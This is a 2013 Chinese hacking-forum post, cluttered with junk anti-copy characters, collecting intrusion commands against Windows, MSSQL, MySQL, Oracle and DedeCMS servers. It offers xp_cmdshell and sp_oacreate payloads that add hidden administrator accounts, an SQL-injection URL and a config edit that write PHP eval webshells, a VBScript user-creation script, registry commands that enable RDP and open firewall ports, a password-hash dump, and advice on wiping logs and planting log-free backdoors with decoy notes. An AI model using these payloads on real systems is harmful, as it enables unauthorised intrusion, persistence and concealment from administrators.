找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4815|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

  |# T. s- Z) y1.net user administrator /passwordreq:no
0 K- c2 l) t# a/ ^- ^- N4 x这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了, u% w! _0 T8 h
2.比较巧妙的建克隆号的步骤6 [$ A6 ^8 V) m7 @+ V
先建一个user的用户
, R5 G% s5 ^$ k# y3 t然后导出注册表。然后在计算机管理里删掉
9 A- t, h7 _8 z- t8 B0 {7 [在导入,在添加为管理员组0 f2 P- ?+ B& \3 F7 z
3.查radmin密码5 Y8 e' a% ]( K
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
' p: I$ l0 r# b, T1 D- z" f3 [4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]% I; [# G" S2 q; _8 N, x
建立一个"services.exe"的项# g# ?3 D  f9 Y+ I8 Z
再在其下面建立(字符串值)& e8 t( D  g7 P
键值为mu ma的全路径
/ T+ |7 t4 e5 Q( T0 [* c; b5.runas /user:guest cmd
; U2 L6 y# B8 j测试用户权限!
" F1 v7 M. Y7 {) u* V6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
8 d- H( P! z$ F1 A, R7.入侵后漏洞修补、痕迹清理,后门置放:4 }& W. k, d/ m0 O
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
7 ^( T- _! E1 y: }' H# f* ^8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c) M! t* v" \: u
. |: H3 M* j; I  `4 q7 y
for example
% D% i8 `1 r6 e/ \, v6 o  u; L& V" r5 E! D8 v6 b
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
5 a2 w/ C% V& m4 ?' c6 o/ l0 }9 U' m3 M8 H8 \/ z+ W  X: \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'( e6 f3 a) T& v7 i1 n5 i
5 Q; m: m" b/ _2 }6 }" B2 e3 Q  }8 w
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
' |+ F+ J+ K. t3 a如果要启用的话就必须把他加到高级用户模式4 V2 J% U& C! O; X: Y* v' D9 P
可以直接在注入点那里直接注入
9 {! ~! m4 S0 D6 L* g! h+ o* kid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--, b) {$ I, n1 ]4 y
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--, y5 z" ?& E  H) k
或者
8 h( l9 }% S, o* v( r) vsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'0 {- x) j) d8 A( N% V( s/ {
来恢复cmdshell。
& l) N* ^% `, b8 ]  a! }! \! {* [: |: w, g: \& }6 ?
分析器( b; g  F  W5 C/ E, `% `% J- D1 L
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--9 @' _7 K1 k8 J8 N3 k  E! _
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")" [& H- j! ?# K$ Z$ ?$ Q; b
10.xp_cmdshell新的恢复办法
9 M) D, l( F) `/ ?, C+ k. jxp_cmdshell新的恢复办法
  F+ W2 t0 n4 w1 F1 r8 g) o扩展储存过程被删除以后可以有很简单的办法恢复:
+ |0 Q  ?. Q, x删除$ y+ i' x* S" A( R; n" R
drop procedure sp_addextendedproc
% s" T% J% b. ^0 s8 s$ |2 P! mdrop procedure sp_oacreate6 Q& ^# s& ]5 s* M- [- l: q
exec sp_dropextendedproc 'xp_cmdshell'
# S3 \1 |4 J8 y- K- }$ F. B" e/ G! Y. p$ x- g
恢复# i3 ?; V, X$ T: ?' x
dbcc addextendedproc ("sp_oacreate","odsole70.dll")7 C5 G, F" X& A6 i/ T, T
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")2 [" q: s( g2 _9 D$ o1 A

* V7 Y' P# E: L: \  B- Z- o. n+ r这样可以直接恢复,不用去管sp_addextendedproc是不是存在8 M0 y/ n% F) {9 b
7 z, y+ s) j; m1 k$ o" i; _9 H2 E
-----------------------------( g% [1 x* g. i5 c/ k/ s% e& b/ c- ^! ~9 g
, |& G3 E9 h6 i! H, j9 K
删除扩展存储过过程xp_cmdshell的语句:! |- D5 [3 T. ?* p
exec sp_dropextendedproc 'xp_cmdshell'3 S, Q: W# o* A# m. S: |0 C$ A
9 o: {4 V! d/ b* ~9 T, n
恢复cmdshell的sql语句) L, o4 q  F+ \3 Z6 [- [2 Y. \( M% {3 e
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll', x9 {+ V( r8 s3 z, D. _- p  q0 v& V
/ a, g' X+ @0 S, z3 `
# s/ O7 f3 y' z, z4 l7 T/ }4 Q
开启cmdshell的sql语句
+ A2 z) |9 P( Y1 K/ [
2 i* i/ W1 [8 Y6 `  U; A% {) Hexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
) O! t9 S. ?1 j& m) E. k+ t- w8 Y7 i4 X* y) Y$ `
判断存储扩展是否存在2 s' }$ Q: q" u  {
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'4 b: y) k8 `. D+ v8 k( S8 e
返回结果为1就ok
- i3 W7 R6 l$ V$ z/ \
/ w; m( L- G" ~# @2 ~恢复xp_cmdshell
6 C+ [6 d5 K  y5 r* t/ Gexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'. f- G8 q) h4 U; X& K% p4 I  m
返回结果为1就ok
& \  P% Q5 @; B  d  }. K" i' i7 L9 F2 G1 G( R
否则上传xplog7.0.dll, f% }2 V) s6 ?1 G
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
* l4 w* a1 d+ B
" u8 b& \" `4 B1 K( F% Y) N堵上cmdshell的sql语句$ X$ M8 T! X2 `6 ]
sp_dropextendedproc "xp_cmdshel7 Y6 {! I% Y" U7 e9 P! v6 ~
-------------------------& S2 q: C2 |! {; z
清除3389的登录记录用一条系统自带的命令:" c2 c$ J4 J; _7 x  P( z) l! J0 L
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f7 s, E  F$ F% |/ }/ T, s
' O- e% Q- y) n* `
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件9 J4 S) h! H2 Y% K
在 mysql里查看当前用户的权限" w0 g' k% S1 M
show grants for  
5 u$ M1 s5 N$ b4 _9 s
& ?& W9 A9 Z0 [6 Q% f以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。' a6 g* A% E1 ^4 ]+ |

" ]0 ]5 h$ i# z* o9 K
8 \0 ~4 \/ S5 O& @Create USER 'itpro'@'%' IDENTIFIED BY '123';- O5 g7 i8 F% O! {; U- y
) w6 f' v5 ~8 X8 C8 j" N9 {6 v( Y2 f
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION5 K) a) `7 I+ x& M/ }. j
7 U. f% r& ~6 u% r3 j3 W$ l
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0" W/ m" `1 G" s' I
9 Q! n- ^. X$ }
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;* b: H( r  M1 _6 }7 w

3 E5 V0 j1 g* V1 {1 r: Z搞完事记得删除脚印哟。
2 i. ~- p9 X. E5 ?; F- U- P; t7 g* y5 ?6 Y5 m
Drop USER 'itpro'@'%';; @1 P3 ~# i  [
# Y) G9 i0 i9 W6 t) J) W  \! a1 ^* B
Drop DATABASE IF EXISTS `itpro` ;) ]$ z* ?- F, X+ ~+ s! X
4 ?- l& H: u7 C- h' m; J! H
当前用户获取system权限
) |( A& t- |/ g  Jsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
9 X9 v6 k; _) E9 T% Ysc start SuperCMD2 M. k7 a$ B3 J& o! z8 V
程序代码0 c1 ^3 L9 o) C
<SCRIPT LANGUAGE="VBScript">% z+ X0 @! M+ T+ C& b
set wsnetwork=CreateObject("WSCRIPT.NETWORK")0 ^* M) {. k6 k5 T0 L8 K0 V) g
os="WinNT://"&wsnetwork.ComputerName
& D' b- P. U5 f9 I+ J9 |3 kSet ob=GetObject(os)
( ~/ c$ {' u6 P4 v/ L: c8 n1 @Set oe=GetObject(os&"/Administrators,group")( P2 x  I+ A# g2 p
Set od=ob.Create("user","nosec")4 j/ j: L+ T6 r
od.SetPassword "123456abc!@#"
/ P4 `5 O' z  Y5 l2 d4 m( @' Uod.SetInfo
" j0 _3 P) g  g: ^! d* o1 |Set of=GetObject(os&"/nosec",user)
1 d# S3 Y+ P& Noe.add os&"/nosec"$ ^# Y1 X9 ^2 @- Z
</Script>) H  B5 p1 F$ o" h) K1 y
<script language=javascript>window.close();</script>& _; e: T0 p& }7 O+ B' N

0 Q$ a. Z( @8 J4 a+ F/ [1 P- s& l8 k6 v% ?) [" w1 o
7 ]% e, d" Z+ e# O8 J3 g
1 W% M4 a- }5 p3 m
突破验证码限制入后台拿shell
! K7 s- _* l- s$ k5 V8 n7 A) ]- r程序代码+ w+ w3 B! ^) g9 e
REGEDIT4
: ]! h% K3 ]1 f5 N- ?[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
% @4 l) s2 Z2 `. X4 l4 `"BlockXBM"=dword:00000000
' a( }: f/ S4 n5 M, Y) n. Z. w
& `3 r+ {4 x7 R9 i. Q/ v% U7 K' r保存为code.reg,导入注册表,重器IE/ {0 O: L: D0 f& [6 O# |- ?
就可以了3 A. p9 Q/ i( u: v( j& I  r6 ^
union写马8 r0 H0 b! ]0 |# J; t" Y
程序代码3 j  p! R5 S* w& M6 \
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*0 o8 e9 W5 a  f0 F. a
5 D. m& S: o4 }  ]& y5 d! f
应用在dedecms注射漏洞上,无后台写马5 F5 B! s" s' |( r" W- R  f
dedecms后台,无文件管理器,没有outfile权限的时候
; M" ~1 l; b8 g. F8 F在插件管理-病毒扫描里( b8 @* n1 S+ ^2 J: ~
写一句话进include/config_hand.php里$ n5 K- y7 x  X) ?' v# t, @
程序代码
' ]& O' P! ^( ]$ ^, a9 `  Z; ?>';?><?php @eval($_POST[cmd]);?>
& v' L" ]& u$ @2 t$ y3 e( e) u
# I4 }1 [8 o( V
/ m' k! k* f- V) v/ b* G如上格式4 z9 I' l* u5 F4 p% e9 T+ z

) d/ z+ n8 E0 I$ K$ s, i) aoracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
$ o# J6 E. W& q, i. }% F! J程序代码8 ?1 @! q7 R) r% v9 x
select username,password from dba_users;
) l/ p6 \4 x  _( F9 j! Y6 h* M* b: a, c% N
$ `2 v, H. U7 v# d, d7 v
mysql远程连接用户2 m+ H- s8 v8 x* v5 }
程序代码
* h. O* P9 w5 C
% F) L  E9 R) |0 Q) t8 f3 [0 nCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
; D5 q' t1 u: x5 e3 K* P/ U; nGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
# {5 y( z$ K* X8 GMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
! C% ~4 V! l( M  BMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
+ Y$ n2 R6 H0 l! x  r# L
; g* t( K, W5 w9 [% b. ?" @+ a9 v6 Q% g* B( _

3 x) b; _% S( Y" g4 C! b0 \6 ^9 C7 h8 J. r( s0 Z, B
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0& W% M: d, G( @: [) p& q' {
1 j2 @9 a& D2 @" m
1.查询终端端口
8 X$ G  P7 r" r5 H: g( J- q2 ^
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
" Y/ `# Y7 N# _% t6 M( a5 k9 U" ?. T; U9 [6 K- A9 Z+ N3 v
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
0 {1 L! \1 e# J! m0 u8 ytype tsp.reg' N2 M) Z  `+ c1 E8 ~( g, Y
, r" A3 a% c* U+ _
2.开启XP&2003终端服务
) J7 M1 T6 A5 h- U  Y+ v4 S$ `6 @& E
! r0 z! v3 G0 L0 M* P; w2 V
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f( G& L( E& B+ a- b# l

) L$ `! c) I6 u7 z! W3 G3 F4 _8 r* h
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# a2 K( K2 z, g$ |1 G5 a- R5 a( m
. b8 K' Q9 D6 r( C3.更改终端端口为20008(0x4E28)
0 C" ^) i6 e8 g7 x1 \  k& O
8 h6 v; _+ Q2 r: |5 o7 AREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f6 M+ a) b# U9 A# ^# O' i9 q4 d, t

- j) Y) h. Q0 I2 c' E: ~) W) ZREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
' D$ R4 T1 M+ @$ P
0 a  ]  b" i8 `9 f) [, P) Q4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
; }" j5 y5 l3 l% v
4 `) Q1 r8 s4 X  w% _, cREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
$ U/ o9 t5 i$ G3 C3 `. t' S& s) h" I+ X4 `) f& Y9 L) G
5 h# E3 N) {# o# R- U$ U% R* b
5.开启Win2000的终端,端口为3389(需重启)
' X. D) w' ?9 M0 D; m9 {2 C" P
1 f  |0 m: n! e# F& A; F- m8 d$ Pecho Windows Registry Editor Version 5.00 >2000.reg
+ m) O2 A8 }, T. _echo. >>2000.reg
2 s. u1 p( h8 N" T5 R  M, Qecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 7 m1 M- w% \7 D) t+ F) z
echo "Enabled"="0" >>2000.reg + C! ~; C$ N5 l( R7 F3 k' B$ L
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 7 r1 B$ U  m. h" q' F# W
echo "ShutdownWithoutLogon"="0" >>2000.reg ! f" n, m# J; z/ I, s5 F0 I4 O1 q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
- r& H4 T# \) O' B1 [, \! [* ]' I6 @echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
# R4 E/ b( ?1 ]& g0 Z  Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ' o( P: K5 _) d9 b! h9 {& ^4 ^
echo "TSEnabled"=dword:00000001 >>2000.reg
8 s, q. y5 p, Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 9 V& F6 z; [' J, T; k2 y
echo "Start"=dword:00000002 >>2000.reg
6 y! L3 @9 v' Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
2 T5 O2 S) M- M* Cecho "Start"=dword:00000002 >>2000.reg " b1 t( u( s" |$ {5 W2 S
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 3 F" I( |. f* D2 v
echo "Hotkey"="1" >>2000.reg 9 C* v( D  `. J& O+ e- _) p$ r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
4 p" _6 x* @7 y9 V- w1 Y+ c  P) _echo "ortNumber"=dword:00000D3D >>2000.reg 4 {* ~/ {- M4 D1 y1 U2 B7 |- i9 S: ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
: U, T. E0 J- X" Oecho "ortNumber"=dword:00000D3D >>2000.reg
( ?3 z$ I" I( k6 G1 m# F
& ~, F, I+ b8 k1 m- }4 }6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
7 I. v4 h" k& G8 {0 U
: L% Q, }) ?4 s, Z- k@ECHO OFF & cd/d %temp% & echo [version] > restart.inf  f! O" Y+ Y6 v2 t7 R4 ~# s/ e
(set inf=InstallHinfSection DefaultInstall)
1 G! b0 i( ]- [9 G9 @& Gecho signature=$chicago$ >> restart.inf
. A! y" F, _0 P) J8 W3 Kecho [defaultinstall] >> restart.inf
0 M! a7 Z, z8 z( i% srundll32 setupapi,%inf% 1 %temp%\restart.inf
; c' t1 H, H; C) k
, J' C+ I+ @8 y% b4 p. B7 P9 L7 z9 [8 M$ @2 S$ o8 ~
7.禁用TCP/IP端口筛选 (需重启)" {8 e. T5 r* Q2 {" {: D$ A
; U7 h; R7 x& e
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
$ r5 Y5 ]1 P( j! f
+ Y% h1 z4 w7 ^0 h! K1 I8.终端超出最大连接数时可用下面的命令来连接
$ [( }$ D6 @7 v3 ^/ C& ~5 d- G7 K; O+ ~; A( {
mstsc /v:ip:3389 /console
7 h" A1 q; p# f% Q* t6 g$ T& g( `$ n% t7 s: L7 B$ Q4 G
9.调整NTFS分区权限
" S! J: ]9 M1 M% R/ H! |, _. E' T, O1 E% p3 m+ e" a7 B$ P
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
& [! n1 j' |; S  Y2 L. r' @* U) \9 L
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)# a# g. j+ f. k
( L! }  e6 S# `, X* U: M- ]$ t; ^  Q! O
------------------------------------------------------
1 E9 O# f, g% Z/ n: ~3389.vbs
, y% T& C6 U* W3 U* U( x( \On Error Resume Next
; O! T- W8 [% Aconst HKEY_LOCAL_MACHINE = &H80000002+ c3 M- F/ l) X; Z' `: x9 A6 T
strComputer = "."
/ y4 `, a* q; ], P; c6 LSet StdOut = WScript.StdOut; K* |) Y9 m' P0 C0 z9 E. z; U
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
# @! z  |3 M; t+ m0 UstrComputer & "\root\default:StdRegProv"), Z: b7 ~3 m; x% ^8 `( _7 L
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
* y6 z/ u# B* @9 O- X) H  {oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath+ W$ d* M5 v& X/ y8 _
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"2 k$ y$ A+ Y7 E
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath5 \& e& w3 T7 t
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"0 n& [( d& S( \) f9 q" i* }
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"- \; F% p, b$ p/ t. [0 S
strValueName = "fDenyTSConnections"* k$ @' H: `7 k) G, O9 a4 a7 h
dwValue = 0
" _" {/ v; A6 V" F) Qoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue. H* A& P0 [8 c* b
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
* x2 T- y5 z) @6 DstrValueName = "ortNumber"
+ J: ~; Y! \4 ^dwValue = 3389# j& K$ F& u( l6 o) m
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue3 I6 M. q  h5 m4 P* }/ f5 p
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
( M; U& e3 {7 P7 s! N4 L. jstrValueName = "ortNumber"
1 a% h, `4 K* O/ u; u* Q: l( hdwValue = 3389
2 T2 A) f+ t* R- ~/ x0 `oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue; J( m" w) Q! a" |6 ~3 F) i+ S
Set R = CreateObject("WScript.Shell")   F7 C& ~) I7 h% W- W( I5 `
R.run("Shutdown.exe -f -r -t 0")
2 S( i7 k( _6 q2 g& s: Z2 i' |: Q# l
删除awgina.dll的注册表键值: e; }3 f! H8 M" P
程序代码
, }4 y* }3 V' R; b, X# R4 m
! T3 E  P4 A: N8 D5 creg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f' V' G5 e* ~2 K; z2 P# |/ X" P
0 p3 M; G* E) A7 ?" d+ {2 W2 Q
: `/ y- O2 M& a! L: s9 l% ~; v

" B6 z& R( V* K
* T* K/ D3 {6 y$ E( [& l程序代码
% ]# q' h5 K: X! w. oHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
* ~1 z" r7 H( Q1 X
4 [6 f9 ^- Y1 J& q: Z/ }2 ]+ a* @设置为1,关闭LM Hash
) |' b) G+ v3 [- ]
. P' C' n' {  H9 ~1 j# T, ^" n数据库安全:入侵Oracle数据库常用操作命令( u- L. h, z: Q2 \9 Y
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。9 K# J, d% \/ W- ^1 Y0 r
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
8 P4 Q# J" h% `* }5 o/ P2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
: r0 j4 Z. ?4 R1 F/ g, J/ b3、SQL>connect / as sysdba ;(as sysoper)或5 ?' A7 Z% M- l! u- W: s
connect internal/oracle AS SYSDBA ;(scott/tiger)' l0 V- ?6 Y3 G% g! c" B4 {
conn sys/change_on_install as sysdba;$ B4 H# Y6 \% n" @, o+ w$ R- Y% @
4、SQL>startup; 启动数据库实例
2 R5 `2 I6 ]' O4 b5、查看当前的所有数据库: select * from v$database;
7 c( ]8 m7 F, {0 @6 u5 T# E; pselect name from v$database;
: ~1 q' A4 S1 W8 f/ {6、desc v$databases; 查看数据库结构字段5 m# X7 d  `* U- J, B; A' b2 L$ H
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
- H3 N$ M+ ~; K/ V" _SQL>select * from V_$PWFILE_USERS;$ k! [4 N6 z+ d. I
Show user;查看当前数据库连接用户
* i4 Q0 @/ S- E) K6 N8、进入test数据库:database test;4 p) B+ t+ ?3 N; H% |5 H" k
9、查看所有的数据库实例:select * from v$instance;
3 G" U* w2 S. L& w, i! R如:ora9i) B% \8 T+ l4 F& R2 ?5 g: b
10、查看当前库的所有数据表:0 _* x' ?) E2 R: d
SQL> select TABLE_NAME from all_tables;
0 B2 |( z6 i- z( B0 s) n2 [select * from all_tables;7 \/ l3 C( A: C2 k: x
SQL> select table_name from all_tables where table_name like '%u%';, C" |' X$ T1 n' l
TABLE_NAME
0 d# n" q2 `. v& s& u% {" R: [------------------------------7 }- l" J5 p; H5 N
_default_auditing_options_9 z- p3 N5 u) a% t; q  F7 N5 S
11、查看表结构:desc all_tables;+ C$ ^/ i6 b1 [
12、显示CQI.T_BBS_XUSER的所有字段结构:
$ o0 \: Z/ J" E1 ]/ K; Sdesc CQI.T_BBS_XUSER;
( o3 y7 H$ W( @$ v1 }6 i. i13、获得CQI.T_BBS_XUSER表中的记录:* g7 I5 T4 I- i2 D$ ^
select * from CQI.T_BBS_XUSER;$ z& p( y6 }3 a2 y5 u
14、增加数据库用户:(test11/test)  H  A5 h. \$ l# ^* r
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
1 u3 w+ I+ }# w1 B5 G# [: p1 e15、用户授权:
( _! k! V; a4 `grant connect,resource,dba to test11;3 K" ~3 X+ r# V4 N- \
grant sysdba to test11;0 f: S; _& {- [1 Z
commit;, G! U2 J$ _9 t; U2 l2 \
16、更改数据库用户的密码:(将sys与system的密码改为test.)" o7 r- G: R& ~/ T: {" w2 M' e
alter user sys indentified by test;2 L8 A( \/ H+ i+ D; B8 d* C
alter user system indentified by test;
) C' |3 z: x7 x! C
0 X/ H8 l1 O+ h* ?% Y+ Z0 SapplicationContext-util.xml
$ h7 Z( O) Q0 dapplicationContext.xml
% G5 r* h! a, Bstruts-config.xml9 ~- D$ z& Q) w: h) B  N" Z" K
web.xml
+ i' t- H! u1 Q5 H0 ?server.xml
; o; h$ Y3 N6 p) Rtomcat-users.xml
; ]+ z$ k3 c# `3 ?hibernate.cfg.xml
* Q+ _' }$ O+ E' R: g& t1 Z0 Udatabase_pool_config.xml, B& B: y4 @4 }
4 ?: G% P+ l9 C2 ?

9 P% [$ Z, U0 j! y\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置+ `! F. }! c  P& F. m
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini/ z1 t0 [: L' \6 Q
\WEB-INF\struts-config.xml  文件目录结构
4 |+ P7 S1 M/ M; _- G$ G& y/ L: ~# j- d
spring.properties 里边包含hibernate.cfg.xml的名称5 X( b$ f5 Z. {6 R

( K/ h3 w& b% Q# Y
( J. n' X3 F% I  h) ^* BC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
- c! s' `* n# ~2 V4 s+ W  N/ f) H
如果都找不到  那就看看class文件吧。。9 Q1 A3 Q1 o. {  Z

4 P+ C& S2 [, Y" `! N5 F5 E; v测试1:
. q6 Y/ |' f6 k6 GSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t15 }: x) [% F& c
/ n" U5 I7 E3 i& E& V. `' ^
测试2:/ D+ Y2 q+ w! o  `/ R$ [9 ~4 V0 [  m
. a0 b9 u$ p5 ~6 P
create table dirs(paths varchar(100),paths1 varchar(100), id int)
7 f' W/ H! T/ i8 O9 _: |8 [$ D" S0 w: K0 ^
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--1 a, u* l! G/ b& ^, I" f1 e
4 U! R% P, N' C
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1& T$ {- z& @9 o- Z4 T5 M

5 m  ~, N) P' a6 k6 x$ ^查看虚拟机中的共享文件:0 W- y0 k& V; ]' P5 P' I
在虚拟机中的cmd中执行
  q) t1 ^5 C6 i1 p, a* J% P\\.host\Shared Folders4 y6 ~; n6 ^! R7 n$ m. ~" ?
9 N$ b# p3 C! Q7 C" U1 o9 [# R
cmdshell下找终端的技巧/ v4 t) X) k6 I7 g, T8 m) h
找终端:
. a# [; @- y( \* D3 J第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! + i2 {  U3 V! z) _( [! l- N% F% Q
   而终端所对应的服务名为:TermService
5 ]. j5 ]( g/ ^6 b' L; K4 {第二步:用netstat -ano命令,列出所有端口对应的PID值! 6 N; Y7 E* J# D$ h8 M% |( {2 `- m
   找到PID值所对应的端口
